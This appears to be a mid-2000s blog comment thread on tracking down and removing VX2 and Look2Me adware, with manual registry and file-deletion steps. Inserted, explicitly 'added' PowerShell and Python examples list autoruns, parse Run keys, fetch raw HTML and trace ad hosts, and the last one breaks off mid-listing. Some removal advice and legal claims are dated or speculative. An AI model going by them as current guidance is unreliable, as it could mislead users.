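    # The regedit 'Run' folders the thread has the user search by hand. A Run entry
    # whose file is Missing is the leftover registry tag pointing at a deleted file.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -in $providerProps) { continue }   # provider metadata, not values
            $exe = Get-ExecutableFromCommand -Command ([string]$p.Value)
            [pscustomobject]@{
                Source = $key
                Name   = $p.Name
                Id     = $null
                Path   = $exe
                Trust  = Get-FileTrust -Path $exe
            }
        }
    }
}

# The short list to write down and look up: anything running or auto-started that
# does not carry a valid signature. Drop the Where-Object to see everything.
@(Get-RunningProcessReport) + @(Get-AutorunReport) |
    Where-Object { $_.Trust -notlike 'Signed:*' } |
    Sort-Object Source, Name |
    Format-Table Source, Name, Id, Path, Trust -AutoSize
```

On current Windows releases most operating-system binaries are catalog-signed and show up as Signed; on the Windows 9x/XP-era machines in this thread many would show as Unsigned, so the Process Library lookup remains the fallback for those. An entry that is Missing under a Run key and a process that is running from a temp or profile directory without a signature are the two patterns that most often turn out to be the adware.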

  65. You, sir, are a hero. Will link to this in my LJ.

    On a related note, I am one of those guys who always thought a firewall and antivirus were everything you ever need, so after reading this piece I was worried about spyware infection and immediately grabbed both Ad-Aware and Spybot S&D. I was a bit miffed to find out that the ‘Alexa’ entry in my registry was still there (XP-Antispy was supposed to have killed it), but apart from that, my machine is clean. Go me!

    I heartily recommend ZoneAlarm to everybody 🙂

  67. Thanks for the in-depth piece on this problem.

    For the longest time I could NOT get rid of the damn thing (I had a version from second thought which would install a desktop icon and run a URL tracker). I just deleted ALL my cookies and reran both my spyware programs and deleted the programs it installs. I’m hoping I finally got rid of this bastard.

  69. Yeah, as tacit said, unlikely. I’m a network systems analyst at a managed security services provider, and I can tell you from personal experience that spam and spyware do not get prosecuted; the FBI is just not interested in crimes that cause such little tangible damage. Now, if you can show that it infected a bank or a government institution and caused actual financial loss, then their ears perk up. That, or if there’s child porn involved. It’s scary how quickly the FBI will jump on a case involving child porn. But for general spyware and adware cases like described above, they won’t do anything. Very good writeup BTW.

  74. Now we could make cracks about Way of the Moose, or Ki-YAI-eh? here, but we won’t. Because we’re far too civilized for such juvenile nonsense.

    We have our own brand of nonsense to use.

    *ponders a Leslie Nielsen movie: Spy-ware*

  75. Re: Viewing HTML Source Safely

    (Edit…)
    One of the safest ways to view HTML code is to use something such as, say, telnet. That way, you see the code as it is.
    I’ve coded my own program, CodeFetch, that’ll allow the viewing of any HTML page – just enter the URL and go. It’s a simple thing I made in VB (No, it doesn’t use Inet, it uses Winsock).
    So far, I’ve had no problems with it (not that there really could be any, considering the way it works).

    Oops, I should’ve read the whole thing first… I forgot about Lynx’s -head option…

    • That’s unfortunate. It seems common, though. The legal system tends to move slowly in any country, whereas technology moves very quickly; computers and the Internet have created entire new classes of criminal activity that quite literally didn’t exist a decade or two ago.

      • Indeed it is, on both counts.
        Our copyright laws are lax too, apparently. The problem is, the government’s pretty much swelled up with too many problems to try and start revising laws. =/
        Or maybe it’s the other way around…

  76. Conceal itself from the NT/2K/XP Task Manager? I’d love to see that. I’ve had several programs claim they could do this, but they only seemed to manage this on 9x-based systems.
    That, and I prefer to use SysInternals’ version of the Task Manager, anyway, which seems to see everything as well.

  77. The deal is, we’re only half finished. After you find the source of the problem, get into the recovery console with the command prompt only, and get rid of the problem files. In safe mode, with no GUI, you minimize the chance that VX2 or something like it is running.

    Then you get back into Windows. The registry tags that try to load your problem are still there, but the files are missing, so nothing gets loaded. Then you run your anti-virals, anti-spyware and registry cleaners.

    This won’t get everything but it will take care of most problems that Ad-Aware, Spybot, or your anti-virus program don’t see. If it’s beyond this, it’s certainly beyond my ability to walk a user through the process remotely.

  78. If you read between the lines, what Rackspace is saying is:

    “Yes, we know our client is planting adware on people’s computers. Yes, we support and condone this behavior. We will not terminate our client; instead, we’ll just ask you to ask the client for adware removal software.”

    The problem is, Rackspace’s dirty client is planting the spyware using redirectors and Explorer security vulnerabilities, and hiding the source of the adware by redirecting through servers in other countries. Anyone who lacks the technical skill (and the six hours of work) required to track the infection down to the Rackspace client would never know to contact Rackspace’s client for the removal tool.

    Rackspace knows what their client is doing. They know their client is planting adware. They know their client is taking incredible measures to conceal his identity. They know their client is planting the adware using Explorer exploits. They don’t care; they do not consider this activity “abuse,” and they do not terminate people for doing this. Therefore, Rackspace is dirty.

  80. If you read between the lines […]
    If you do, you assume. If you assume, your arguments are null and void as they are not based on facts, but assumptions.
    I understand what you’re saying, but unless you try to follow at the very least, you can’t even do anything about them but rant and rave.
    And what’s that going to do? Don’t waste your time; make it count. They can be brought to court.

  82. Sorry for being a noob, but I read through all the comments and threads, and I can’t find the answer I’m looking for (which could be due to sleep deprivation, but I thought I’d ask anyway):

    How did you finally get rid of the problem on Shelly’s computer?

    I downloaded Ad-Aware’s VX2 plugin and it doesn’t even find anything, but I still have the problem.

    • If the VX2 plugin doesn’t find anything, then either you have something other than VX2, or you have a new variant of VX2 that the anti-spyware software doesn’t know about yet.

      I eventually had to fix the problem on her computer by removing the hard drive, putting it in my computer, running anti-spyware software from my machine, then using a Registry cleaner tool on it. Big pain in the ass. Had I not had another computer to use, it would’ve been next to impossible.

      • Can you run a regcleaner on a slaved drive? What util do you use, if I may ask?

        Logic tells me that backing up my wife’s music and family photos, wiping the drive, and starting over would have taken less time… but I guess I’m obstinate that way.

        Thanks for your advice.

      • I really hate to be a pain in the ass, and I’m sure you have better things to do than provide free support to a stranger, but I could really use your help.

        I tried your suggestion, but none of the utilities I normally use are capable of scanning the registry on the slaved drive (adaware, spybot, hijackthis, regcleaner). Can you tell me what utilities you used, and any custom configurations you had to implement? Any assistance would be appreciated.

        • I don’t recall the name of the registry cleaner offhand, but her machine was running Windows 2000, which keeps “blank” Registry files that can be recovered either by renaming the files in the Registry hive or by using the Windows 2000 Recovery Console. What I did was rename the files in her Registry hive, then copy the “blank” Registry files, which allowed Windows to start up normally but without any of her device drivers. I then used a third-party Registry tool to clean the old Registry hive and merge it back into the new Registry hive.

          Since then, I’ve discovered an easier, although arguably drastic, way to get rid of VX2:

          1. Run Ad-Aware. It will identify the VX2 files, which typically live in /windows/system32.

          2. Immediately on seeing the report, write down the path to the VX2 files, then pull the plug on the computer. Don’t use Ad-Aware to try to get rid of VX2; it monitors the Registry and rewrites itself with different names when Ad-Aware attempts to clean it. Don’t power down gracefully; VX2 changes the name of its own files randomly on shutdown.

          3. Install the hard drive in another, known-clean computer. Delete the VX2 files from the hard drive. (You can’t do this while the original computer hosting the infection is running, because the files are tagged as being in use.)

          4. Reinstall the hard drive in the original computer; VX2 should now be gone.

          • Another possible approach…

            After you’ve identified the files with Ad-Aware and pulled the plug, perhaps you can boot from a Knoppix CD and then use its tools to delete the files, thus avoiding having to remove the hard drive. I guess I’ll have to take a look at my Knoppix CD to see if it has any file utilities on it I might use to delete the VX2 files.

  87. I FINALLY did it

    Sorry it’s taken me so long to actually DO this… it’s been Finals, and you can imagine how hectic it has been. Firstly, thank you very much for your patient indications, I followed through and found the following:

    Processes Not found in Library:
    WPC54CFG.exe
    OdHost.exe
    TabUserW
    ScannerFinder.exe (I suspect this may be tied to my Microtek scanner?)
    NICServ.exe

    Spyware Found (which Spybot seems to have failed to remove):
    ViewMgr.exe (ViewPoint Media Player)

    No mention of VX2, though, and today Spybot, for the first time, eliminated VX2 from its list of bogies without telling me it couldn’t remove this or that component related to it. However, it seems to have passed VMP by.
    I wait for your feedback. And thanks again 🙂

  88. Re: I FINALLY did it

    Okay… I’m looking in a few other places for details on your processes…

    WPC54CFG.exe is a utility used by the Linksys Wireless-G Notebook adapter. OdHost.exe and NICServ.exe are also associated with this piece of hardware. If you have one of these, then these processes are ok.

    TabUserW is a driver for a Wacom pen tablet. Same as above.

    ScannerFinder.exe is, as you suspected, related to your Microtek scanner.

    If Spybot got rid of VX2 for you, then looks like ViewMgr.exe is the only remaining problem.

    This next part is a bit dangerous for normal users. Print this out, and do exactly what it says.

    Click the Start button, then click Run and type in ‘regedit’ in the box that comes up. This is the Registry Editor. You don’t want to make any changes here – if you change the wrong values, you make your applications or even your entire operating system stop working.

    There should be two panes in the regedit window. At the very top of the left pane, there should be a little computer icon that says ‘My Computer’ next to it. Click on that one to highlight it, then in the Menu bar click Edit, then Find. In the box that comes up, type in ‘ViewMgr’, and click ‘Find Next’.

    It might take a minute to find the entry, and there may be more than one. You can use the F3 key to find the next entry. The registry entry you’re looking for should be in a folder named ‘Run’. (The folders are in the left pane.) In the right pane you should see several columns. If you’ve got the right entry, ViewMgr should appear under ‘Name’. Under ‘Data’ should be the complete name and path of a program. Write it down. Everything from “C:\(whatever)” to “\(whatever).exe”. When you’ve written down this file name, click ‘Registry’ and ‘Exit’ in the Menu bar without making any changes.

    Next you need to reboot. While your computer is booting, hit F8 repeatedly. This should bring up a text menu with several different booting options. If the menu doesn’t come up, reboot and try again. When the menu comes up, what we want is an entry that says something like “Recovery Console with Command Prompt Only” or possibly “Safe Mode with Command Prompt”. If there’s nothing like that there, we can probably make do with the option that says “Safe Mode”.

    If you can get the command prompt option, you’ll boot to a simple black screen with words on it, just like an old DOS computer. Type in “DEL”, then a space, then that whole name you wrote down earlier. It should be something like “DEL C:\(directory names)\(program).exe”. Type that in exactly, and hit return. Then restart the computer again (just hit the reset button, or turn it off and back on again), and run Spybot one last time. Everything should be ok.

    If you get into Safe Mode instead, open up My Computer and look through the drives and folders there for the program you wrote down. If you can’t see it, you may have to change some of the settings under Tools…Folder Options…View until you can see it. Then click on that file and delete it, and make sure to empty your Recycle Bin too. Then restart and run Spybot one last time.

    If you have any problems with this, go ahead and post again. Hope this helps!
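    The lookup described above, as an added Python example that is not part of the original thread: instead of reading the Run keys by hand in regedit, parse an exported copy of them (a .reg file, as written by regedit’s Export or by reg export) and list each startup entry’s name and the executable it points to. The sample export below is constructed for the example, and the ViewMgr path in it is a placeholder, not one observed on a real machine.

```python
import re
from dataclasses import dataclass

# Constructed sample of what an exported Run key looks like (Windows Registry
# Editor 5.00 format). The ViewMgr path is a placeholder, not a real observation.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ViewMgr"="C:\\Program Files\\Viewpoint\\Viewpoint Manager\\ViewMgr.exe"
"Synchronization Manager"="\"C:\\WINDOWS\\system32\\mobsync.exe\" /logon"
"ShellExt"=hex(2):43,00,3a,00,5c,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\temp\\cleanup.exe"
'''

SECTION_RE = re.compile(r'^\[(.+)\]$')
# "Name"=data   (the name may itself contain escaped quotes)
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
AUTOSTART_KEYS = ("\\Run", "\\RunOnce", "\\RunServices", "\\RunServicesOnce")


@dataclass
class AutostartEntry:
    key: str        # full registry key the value lives under
    name: str       # value name, as shown in regedit's "Name" column
    cmdline: str    # value data, as shown in regedit's "Data" column
    image: str      # executable path extracted from cmdline


def unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a backslash.
    return re.sub(r'\\(.)', r'\1', s)


def image_path(cmdline: str) -> str:
    """Pull the executable out of a Run-key command line."""
    cmdline = cmdline.strip()
    if not cmdline:
        return ""
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    # Unquoted: a path with spaces is legal (Windows tries progressively longer
    # prefixes), so cut after the first ".exe"; otherwise take the first token.
    m = re.search(r'\.exe\b', cmdline, re.IGNORECASE)
    return cmdline[:m.end()] if m else cmdline.split(None, 1)[0]


def autostart_entries(reg_text: str) -> list:
    """Return every string value under a Run-type key in an exported .reg text."""
    entries, current = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            continue
        if current is None or not current.endswith(AUTOSTART_KEYS):
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        if not (len(data) >= 2 and data.startswith('"') and data.endswith('"')):
            continue  # hex(2):, dword: etc. are not plain REG_SZ strings; skipped
        cmdline = unescape(data[1:-1])
        entries.append(AutostartEntry(current, unescape(name), cmdline, image_path(cmdline)))
    return entries


def find_entries(entries, needle: str) -> list:
    """Entries whose name or executable file name contains needle (case-insensitive)."""
    needle = needle.lower()
    return [e for e in entries
            if needle in e.name.lower() or needle in e.image.rsplit("\\", 1)[-1].lower()]


def read_reg_export(path: str) -> str:
    # "reg export" writes UTF-16LE with a BOM; REGEDIT4-era files are ANSI.
    with open(path, "rb") as fh:
        blob = fh.read()
    if blob.startswith(b"\xff\xfe"):
        return blob.decode("utf-16")
    return blob.decode("cp1252", errors="replace")


if __name__ == "__main__":
    for e in find_entries(autostart_entries(SAMPLE_REG), "ViewMgr"):
        print(f"{e.name}: {e.image}   (under {e.key})")
```

    The printed image path is the string to write down before booting to the command prompt; `read_reg_export` handles the UTF-16 files regedit produces.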

  89. Re: Viewing HTML Source Safely

    Mmh. Someone asked me to post the source code of CodeFetch, but I can’t reply to their comment yet (due to it still being screened), so I’ll just write my reply here.

    All you need is a Winsock control. Read the help for that control; it contains some valuable information on how to use and control it. Then all you need is to open a connection (TCP, port 80) and send the command and other HTTP headers:
    ' URL(0) holds the host name, URL(1) the path part of the URL
    Winsock.SendData "GET " & URL(1) & " HTTP/1.1" & vbCrLf
    Winsock.SendData "Host: " & URL(0) & vbCrLf
    Winsock.SendData vbCrLf   ' an empty line ends the request headers
    Other headers you can send are Accept, Cache-control, Connection, User-Agent, Host, etc. Remember to end with a CR+LF combination (DON’T use vbNewLine) otherwise the server’ll sit there, waiting for the rest of the data (and possibly just close the connection on you). I suggest that you set both User-Agent (to the name of your app, along with version, notes, URL, etc.) and the Host (the domain you’re trying to reach – important, because otherwise you might, for example, get the index of http://www.yahoo.com instead of mail.yahoo.com).
    All data that you receive, you can just plop into a textbox of some kind.

    For more information, you should read the RFC for the HTTP protocol:
    http://www.google.ca/search?hl=en&q=RFC+HTTP
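    The raw exchange described above, redone as an added Python example (not the commenter’s CodeFetch code): it builds the same GET line, Host header and CR+LF terminated request over a plain socket, adds Connection: close so the server finishes instead of holding the connection open, and splits the reply into status, headers and body (including chunked bodies) without ever handing the HTML to a renderer. The sample response is constructed for the example; mail.yahoo.com appears only as the URL the comment mentions.

```python
import socket
from urllib.parse import urlsplit

DEFAULT_UA = "CodeFetch-example/0.1"  # constructed name; put your own tool's name here


def build_request(url: str, user_agent: str = DEFAULT_UA) -> bytes:
    """Build the raw GET the Winsock snippet sends: request line, Host, blank line.

    Returned as bytes so the CR+LF line endings are explicit and checkable.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    if not parts.hostname:
        raise ValueError(f"no host in URL: {url!r}")
    path = parts.path or "/"                       # "http://host" has an empty path
    if parts.query:
        path += "?" + parts.query
    host = parts.hostname
    if parts.port not in (None, 80):
        host += f":{parts.port}"
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",            # selects the right virtual host (mail. vs www.)
        f"User-Agent: {user_agent}",
        "Accept: text/html",
        "Connection: close",        # 1.1 defaults to keep-alive; ask the server to finish
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                        # skip the data and its CRLF


def split_response(raw: bytes):
    """Split a raw HTTP/1.1 reply into (status code, lower-cased headers, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: header block never terminated")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


def fetch_source(url: str, timeout: float = 10.0) -> str:
    """Fetch a page's HTML as plain text over a socket; nothing is rendered or run.

    Plain http:// only, like the original tool; https would need an ssl.SSLContext
    wrapped around the socket.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    with socket.create_connection((parts.hostname, parts.port or 80), timeout=timeout) as sock:
        sock.sendall(build_request(url))
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:                     # server closed: Connection: close honoured
                break
            chunks.append(data)
    status, headers, body = split_response(b"".join(chunks))
    charset = "iso-8859-1"
    if "charset=" in headers.get("content-type", ""):
        charset = headers["content-type"].split("charset=", 1)[1].split(";")[0].strip()
    return body.decode(charset, errors="replace")


# Constructed reply, so the parsing can be exercised without a network.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"6\r\n<html>\r\n"
    b"7\r\n</html>\r\n"
    b"0\r\n\r\n"
)

if __name__ == "__main__":
    print(build_request("http://mail.yahoo.com").decode())
    print(split_response(SAMPLE_RESPONSE))
```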

  90. Article

    Good article, but I don’t appreciate the crude language and misspellings. They’re unprofessional and rude. Thank you.

  93. If it’s DSO Exploit that keeps popping up, that’s a bug in Spybot. It flags an insecure registry value that Microsoft has long since patched, but then it changes it to a value that’s perfectly safe but isn’t the value it’s looking for, so it keeps finding it and fixing it wrong. Upgrade to the latest Spybot, the problem was fixed not too long ago. But it was never actually a risk as long as you’ve kept up with updates to Windows and IE.

    And yeah, I know your comment is old, but I just stumbled across this entry because someone linked to it in the spywareinfo.com forums. ^_^;

  94. Just pop over to Spywareinfo and we’ll see what we can do for you. They’re the ones that invented the manual fix for this stuff.

    http://forums.spywareinfo.com

    On a side note, Linkey.ru is also where the CWS strain that used the HackerDefender rootkit was hosted – it’s the host for the Outhost.info strain. They’re up to their neck in illegal activities.

  96. Great article; these guys are lower than low.

    Last night I went through virtually the same ordeal with VX2. The primary villain from what I could discern was NicTech Networks. They kept redirecting to a “security website” and warning me that SpyWare was installed on my PC and I should install their software to remove it. I too ran all the cleaners I could and I tried to clean it manually in the Registry and by deleting files (morphing DLLs that I couldn’t delete because they had them locked). In the end I did a system restore back to January 1 and that removed the driver (I think that’s what it is — a SYS file (?)) and it appears to be fixed.

    I do hope these losers get what they’ve got coming eventually. I was up ’til 4:00 AM dealing with this. They stole sleep from me and caused unnecessary stress. I think it’s time to implement the Death Penalty for spyware!

  98. Great research. I don’t know a lot about computers, but I know mine is infected with some variant form of VX2. None of my spyware and virus programs will get rid of this; they just state the obvious and tell me I have VX2!!! (c:\WINDOWS\system32\166o0gj3e6o.dll) My Ad-Aware plugin shows that my system is clean. My computer will not let me restore or search files and folders, and my Norton has been lost somewhere in my computer’s never-never land. I’ve tried Spybot S&D, CWShredder, and a number of other products that give you a free download to state the obvious and then want $29.99. Now what else is there for me to do? I wonder what I should do now? Will a system reboot do the trick?

    • One of the problems with the newest VX2 variants is that they make themselves system processes, so they load even if you start the computer in safe mode. Rebooting won’t get rid of them.

      The easiest way I have found to get rid of VX2 is kind of drastic, and requires a second computer:

      1. Run Ad-Aware. Write down the list of files it reports, but don’t tell them to delete the files. The files change their names periodically, so you have to get a current list.

      2. Pull the plug on the computer to shut it down. You can’t use the Shut Down command, because VX2 changes the names of the files every time you do.

      3. Put the hard drive into another computer, that is known to be clean, and delete the VX2 files from the hard drive. You have to do it that way because you can’t boot from the hard drive; if you do, you can’t delete the VX2 files.

      It’s obnoxious, but it’s worked for me.

      • Wouldn’t a live Linux CD work, too?

        To make this process a little easier, couldn’t you go ahead and do the following in this order?

        1. Run Ad-Aware but have it NOT delete the files
        2. Insert a live Linux CD
        3. Unplug the computer when Ad-Aware is done
        4. Plug it back in, booting to the live CD

        Would that work?

    • I think Symantec fixed my LOOK2ME

      I had all the symptoms described before, and mine had latched onto explorer.exe and winlogon.exe. I tried all the tools mentioned, but I think the actual fixer was a simple program by Symantec. The link is:
      http://securityresponse.symantec.com/avcenter/expanded.threats.tools.list.html

      Then select Spyware.Look2Me

      This was particularly helpful in my case, with a corporate laptop with tech support itching to format my drive, and no administrator user, no WinXP boot disks to boot to the recovery console, etc.

      It’s worth a try…

  101. prosecution of aliens

    Anyone who lives outside of the USA and does quantifiable damage to a US citizen or his property is subject to US federal law. While I’m not a computer law expert, there is probably some theory of torts that would apply. These malcontents must file responses or be subject to summary judgment (you win by a motion for their failure to respond). If the number of suits were in the hundreds of thousands, their legal fees would be astronomical, taking the incentive out of their bad-minded motives… It costs about $225 to start a case in federal court, which is part of the money available in recovery. Of course, the court where the damage was done (your house) is the proper court, so it is unlikely that one law firm could battle all the suits.

    • Re: prosecution of aliens

      A small comment: how will you enforce the court’s judgment in Ulan Bator (for example)? Or are you thinking of the SBP?

      In case you didn’t know yet, the US is *** just a part *** of the world 😉

      • Re: prosecution of aliens

        The US is just “part” of the world?

        Please…. Ok, all the countries who have been to the moon, raise your hands.

        (Counts ONE)

        Ok, the rest of you are THIRD WORLD COUNTRIES.

        ‘Nuff said.

  104. Bargain Buddy

    About that Bargain Buddy mentioned: Microsoft AntiSpyware said it had got on my computer, prevented it from running, and was able to easily remove it. I have Ad-Aware Pro and Spybot, and they are both very good products; however, I think Microsoft’s program has them both beat.
    And it’s free 🙂 Also, I have occasionally had a pop-up and, like it was said, it was usually for some pop-up blocker or something similar. Now why would anybody buy a product from any company that resorts to that type of advertising, especially when they are trying to sell you a product to prevent such from happening!! At least that’s what goes across my mind when I see those types of products in a pop-up. Thanks for the info 🙂

  106. what if….

    What if you use Firefox? Will you get infected? Or maybe Opera? Because I use both of those and took IE off my computer.

    • Re: what if….

      This particular vulnerability affects only Internet Explorer, as it exploits an iFrame security hole common (as far as I can tell) only in Explorer. That doesn’t mean there aren’t any exploits affecting browsers such as Opera or Firefox, but this one doesn’t appear to be one of them.

  110. THANK YOU!

    First off, you’re my new hero. Thank you so much! Half the stuff you named in your article was on my computer, well over 50 NicTech applications, plus a bunch of other stuff; it was frightening. Now I know why my computer’s been so messed up and I get millions of popups and files trying to download constantly w/out permission. I definitely have a VX2. Keep fighting the good fight!

  112. Wow, great article and great detective work! I found it from one of the moderators at cexx.org linking you on the message boards.

    These guys & their ever-mutating flagship malware really get around. Doxdesk and I dug some dirt on these b***ards in ’01 thanks largely to poor security practices on their part, but I kind of lost sight of them after that. It’s sad to see that they’re still alive and kicking after all this time. 🙁

  114. Now, more than ever, EVERYONE needs this tool

    A great little program I have used for years automatically backs up the registry each time the system boots and lets you restore that backup in less than two minutes. It is named ERUNT, written by Lars Hederer and a page I have written on it is here: http://www.computer-help.net/Best-Registry-Backup.html
    Get it before you are infested with almost anything and you can evict the bad guy(s) with click, click, and reboot.

  116. More on Look2Me

    There is now a new addition to one part of this story. NicTech Networks is responsible for a new version of their own Look2Me adware program (also known as the W32.Canbebe Trojan). Their new code (March 15, 2005) is a randomly named stealth DLL that serves up ads and hides itself well.

    There is no indication of this new version being present in Ad-Aware, Spybot or HijackThis logs. Its DLL does not show up in folder displays or directory listings. The only clue a user has that it is present on a system is the popup ads and the observation that Explorer does not show up in the Task List, making it difficult to kill Explorer so you can remove this DLL if you just happen to find the randomly named DLL. There is a different version of the module for Windows 98/ME and NT/XP. And older removal tools do not seem to work with it.

    This new version comes complete with a valid Digital Signature issued to NicTech Networks by Thawte Code Signing CA. This is viewable by checking its properties should you manage to find the DLL module.

    The DLL can download updates from http://www.a-d-w-a-r-e.com servers, and appears to have a backdoor in it. If you have a software Firewall blocking Explorer from accessing the Internet, it has been reported to popup a window asking if you would like to download an “update DLL” for the program you just installed. For some like Ad-Aware and Spybot, it displays the program name and it web site URL.

    Despite being very stealthy and well hidden, you can find its DLL module name(s) by using the Search function. Search for *.DLL and, in the Containing text field, NicTech Networks

    The good news is, some of the major Anti-Virus providers now have copies of this module and a few like CA eTrust already detect it and can remove it.

    CA eTrust W32.Canbebe Trojan

  118. VX2 infection

    I just got a VX2 infection on an old win98 computer by another mechanism. The computer has all the updates, but I know that MSFT no longer supports win98 even though they claim to provide security updates. While simply sitting idle, with only Eudora, an open IE window and SETI@home running, something crashed in and caused an error page to come up (general exception fault). On re-boot, Windows said that “it was updating my settings”, a sure sign that something was just installed. Sure enough, Ad-Aware found VX2, and was able to remove it (or so it says). Another computer on the same home network running XP SP2 did not get infected. There must be variants of VX2 that use buffer overruns or some other generated error to install themselves.

    • Re: VX2 infection

      Below you will find a few URLs that are from the pop ups I get because of this virus…I have done everything I can think of to get rid of it but nothing works, and now I can't use my CD drive because it is disabled and I can't get it working at all…This is so frustrating

      Tammie

      http://www.onlineshopp-ing.com/muon.html
      http://www.onlineshopp-ing.com/neutron.html
      http://www.uniqueoffer-s.com/muon.html
      http://www.realcoupon-s.com/muon.html
      http://www.realcoupon-s.com/neutron.html
      http://www.dealiotoday.com/muon.html

      • Re: VX2 infection

        Interesting. All of those Web sites are hosted by Level 3 Communications (www.level3.net). Each of them has a link to another ad server, http://ad.firstadsolution.com — hosted by Mzima Networks (www.mzima.net). Mzima Networks has a network peering agreement with Level 3.

        Level 3 Communications does not have a good reputation for shutting down spammers and network abusers; I have no idea what Mzima’s spam policies are.

        A Google search for “firstadsolution.com” shows that many, many people are complaining about adware and malware serving popups from ads.firstadsolution.com, so it seems likely that either they are directly involved in the creation of adware and malware, or at best they permit it.

        Firstadsolution.com is run by yieldmanager.com:

        tacit$ dig ad.firstadsolution.com

        ; <<>> DiG 9.2.2 <<>> ad.firstadsolution.com
        ;; global options: printcmd
        ;; Got answer:
        ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39001
        ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 1, ADDITIONAL: 0

        ;; QUESTION SECTION:
        ;ad.firstadsolution.com. IN A

        ;; ANSWER SECTION:
        ad.firstadsolution.com. 775 IN CNAME ad.yieldmanager.com.
        ad.yieldmanager.com. 15 IN A 72.37.157.36

        ;; AUTHORITY SECTION:
        ad.yieldmanager.com. 79 IN NS ns.yieldmanager.com.

        ;; Query time: 61 msec
        ;; SERVER: 192.168.1.1#53(192.168.1.1)
        ;; WHEN: Sun Apr 23 13:05:55 2006
        ;; MSG SIZE rcvd: 103

        Yieldmanager.com is just an advertiser login page. The login page links to rightmedia.com.

        So the infection you have is serving ads originating from rightmedia.com. Advertisers pay rightmedia.com to show their ads; rightmedia.com pays whoever wrote the malicious software you are infected with, or writes the malware themselves.

        tacit$ whois rightmedia.com

        Whois Server Version 2.0

        Domain names in the .com and .net domains can now be registered
        with many different competing registrars. Go to http://www.internic.net
        for detailed information.

        Domain Name: RIGHTMEDIA.COM
        Registrar: DOTSTER, INC.
        Whois Server: whois.dotster.com
        Referral URL: http://www.dotster.com
        Name Server: PDNS4.ULTRADNS.ORG
        Name Server: PDNS3.ULTRADNS.ORG
        Name Server: PDNS2.ULTRADNS.NET
        Name Server: PDNS1.ULTRADNS.NET
        Status: ACTIVE
        EPP Status: ok
        Updated Date: 13-Mar-2006
        Creation Date: 30-Mar-2003
        Expiration Date: 30-Mar-2007

        >>> Last update of whois database: Sun, 23 Apr 2006 13:09:42 EDT <<<

        Registrant:
        Right Media, LLC
        276 5th Av. Ste. 401
        New York, NY 10001
        US

        Registrar: DOTSTER
        Domain Name: RIGHTMEDIA.COM
        Created on: 30-MAR-03
        Expires on: 30-MAR-07
        Last Updated on: 13-MAR-06

        Administrative, Technical Contact:
        Administrator, DNS RIGHTMEDIA.COMyFeMC0@privacypost.com
        Right Media, LLC
        276 5th Av.
        Ste. 401
        New York, NY 10001
        US
        212-561-6474
        212-561-6471

        Domain servers in listed order:
        PDNS1.ULTRADNS.NET
        PDNS2.ULTRADNS.NET
        PDNS3.ULTRADNS.ORG
        PDNS4.ULTRADNS.ORG

        So that means the company that is paying the people who have infected your computer is:

        Right Media, LLC
        276 5th Av.
        Ste. 401
        New York, NY 10001
        US
        212-561-6474
        212-561-6471

        Wikipedia entry on RightMedia

        RightMedia’s email addresses are:

        By email (many options):
        General information – info@rightmedia.com
        Advertiser Sales – advertiser@rightmedia.com
        Publisher Sales – pubsol@rightmedia.com
        Account Managers – accountmgmt@rightmedia.com
        Support – support@rightmedia.com
        Jobs – jobs@rightmedia.com

        I have sent an email to Right Media asking them what their policies on popup advertising through malware like VX2 are.
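        The chain traced above (popup host, its CNAME to the ad network, and the registrant behind it) can be scripted against saved dig and whois output. The following is an added example and not part of the original post; the two sample texts are constructed from the records quoted in the reply, and the parser assumes dig's usual one-record-per-line answer section.

```python
"""Follow a popup ad host back to the party paying for it, using saved
`dig` and `whois` output (added example; not the blog's own code)."""
import re
from typing import Dict, List, Tuple

# Constructed sample: the dig output quoted in the thread above.
DIG_OUTPUT = """\
; <<>> DiG 9.2.2 <<>> ad.firstadsolution.com
;; ANSWER SECTION:
ad.firstadsolution.com. 775 IN CNAME ad.yieldmanager.com.
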